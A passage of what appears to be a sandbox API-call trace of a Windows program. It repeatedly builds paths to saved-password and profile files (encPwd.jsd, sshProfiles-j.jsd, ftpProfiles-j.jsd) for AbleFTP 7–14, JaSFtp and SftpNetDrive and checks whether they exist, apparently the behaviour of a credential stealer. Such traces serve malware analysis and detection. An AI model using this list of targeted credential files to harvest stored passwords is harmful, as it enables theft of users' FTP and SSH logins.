param_1=0x63b6b8, param_2="%s\\SftpNetDrive", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0063.530] GetProcessHeap () returned 0x620000 [0063.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x68) returned 0x638b60 [0063.530] GetProcessHeap () returned 0x620000 [0063.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b8 | out: hHeap=0x620000) returned 1 [0063.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.531] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0063.531] GetProcessHeap () returned 0x620000 [0063.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.531] GetProcessHeap () returned 0x620000 [0063.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.532] GetProcessHeap () returned 0x620000 [0063.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.532] GetProcessHeap () returned 0x620000 [0063.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b488 | out: hHeap=0x620000) returned 1 [0063.532] GetProcessHeap () returned 0x620000 [0063.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.533] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.533] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0063.534] GetProcessHeap () returned 0x620000 [0063.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.535] GetProcessHeap () returned 0x620000 [0063.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.536] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0063.536] GetProcessHeap () returned 0x620000 [0063.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.536] GetProcessHeap () returned 0x620000 [0063.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.537] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.538] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.538] GetProcessHeap () returned 0x620000 [0063.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.538] GetProcessHeap () returned 0x620000 [0063.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.539] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.539] GetProcessHeap () returned 0x620000 [0063.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.539] GetProcessHeap () returned 0x620000 [0063.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.540] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.540] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.540] GetProcessHeap () returned 0x620000 [0063.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.540] GetProcessHeap () returned 0x620000 [0063.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.541] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.542] GetProcessHeap () returned 0x620000 [0063.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.542] GetProcessHeap () returned 0x620000 [0063.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.543] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.544] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0063.544] GetProcessHeap () returned 0x620000 [0063.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.544] GetProcessHeap () returned 0x620000 [0063.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.545] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0063.545] GetProcessHeap () returned 0x620000 [0063.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.545] GetProcessHeap () returned 0x620000 [0063.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.546] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.547] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.547] GetProcessHeap () returned 0x620000 [0063.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.547] GetProcessHeap () returned 0x620000 [0063.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.548] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.548] GetProcessHeap () returned 0x620000 [0063.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.548] GetProcessHeap () returned 0x620000 [0063.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.549] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.549] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.549] GetProcessHeap () returned 0x620000 [0063.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.549] GetProcessHeap () returned 0x620000 [0063.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.551] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.551] GetProcessHeap () returned 0x620000 [0063.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.551] GetProcessHeap () returned 0x620000 [0063.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.552] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.552] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0063.552] GetProcessHeap () returned 0x620000 [0063.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.552] GetProcessHeap () returned 0x620000 [0063.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.553] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0063.553] GetProcessHeap () returned 0x620000 [0063.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.554] GetProcessHeap () returned 0x620000 [0063.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.554] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.555] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.555] GetProcessHeap () returned 0x620000 [0063.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.555] GetProcessHeap () returned 0x620000 [0063.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.556] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.556] GetProcessHeap () returned 0x620000 [0063.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.556] GetProcessHeap () returned 0x620000 [0063.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.557] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.557] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.557] GetProcessHeap () returned 0x620000 [0063.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.557] GetProcessHeap () returned 0x620000 [0063.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.558] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.558] GetProcessHeap () returned 0x620000 [0063.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.562] GetProcessHeap () returned 0x620000 [0063.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.563] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.563] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0063.563] GetProcessHeap () returned 0x620000 [0063.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.563] GetProcessHeap () returned 0x620000 [0063.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.564] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0063.564] GetProcessHeap () returned 0x620000 [0063.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.565] GetProcessHeap () returned 0x620000 [0063.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.565] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.566] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.566] GetProcessHeap () returned 0x620000 [0063.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.566] GetProcessHeap () returned 0x620000 [0063.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.567] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.567] GetProcessHeap () returned 0x620000 [0063.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.567] GetProcessHeap () returned 0x620000 [0063.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.568] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.569] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.569] GetProcessHeap () returned 0x620000 [0063.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.569] GetProcessHeap () returned 0x620000 [0063.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.570] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.570] GetProcessHeap () returned 0x620000 [0063.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.570] GetProcessHeap () returned 0x620000 [0063.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.571] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.571] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0063.571] GetProcessHeap () returned 0x620000 [0063.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.571] GetProcessHeap () returned 0x620000 [0063.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.572] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0063.573] GetProcessHeap () returned 0x620000 [0063.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.573] GetProcessHeap () returned 0x620000 [0063.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.574] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.574] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.574] GetProcessHeap () returned 0x620000 [0063.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.574] GetProcessHeap () returned 0x620000 [0063.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.576] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.576] GetProcessHeap () returned 0x620000 [0063.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.576] GetProcessHeap () returned 0x620000 [0063.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.577] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.577] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.577] GetProcessHeap () returned 0x620000 [0063.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.577] GetProcessHeap () returned 0x620000 [0063.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.578] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.579] GetProcessHeap () returned 0x620000 [0063.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.579] GetProcessHeap () returned 0x620000 [0063.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.579] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.580] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0063.580] GetProcessHeap () returned 0x620000 [0063.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.580] GetProcessHeap () returned 0x620000 [0063.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.581] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0063.581] GetProcessHeap () returned 0x620000 [0063.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.582] GetProcessHeap () returned 0x620000 [0063.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.582] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.583] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.583] GetProcessHeap () returned 0x620000 [0063.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.583] GetProcessHeap () returned 0x620000 [0063.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.584] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.584] GetProcessHeap () returned 0x620000 [0063.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.584] GetProcessHeap () returned 0x620000 [0063.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.585] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.586] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.586] GetProcessHeap () returned 0x620000 [0063.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.586] GetProcessHeap () returned 0x620000 [0063.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.587] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.588] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.588] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0063.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.590] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0063.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.591] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.591] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.592] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.593] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.594] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.595] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.598] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.600] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0063.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.602] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0063.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.605] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.608] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.610] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.611] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.612] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.613] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.614] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.614] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0063.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x638b60 [0063.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.616] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0063.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.617] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.618] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files 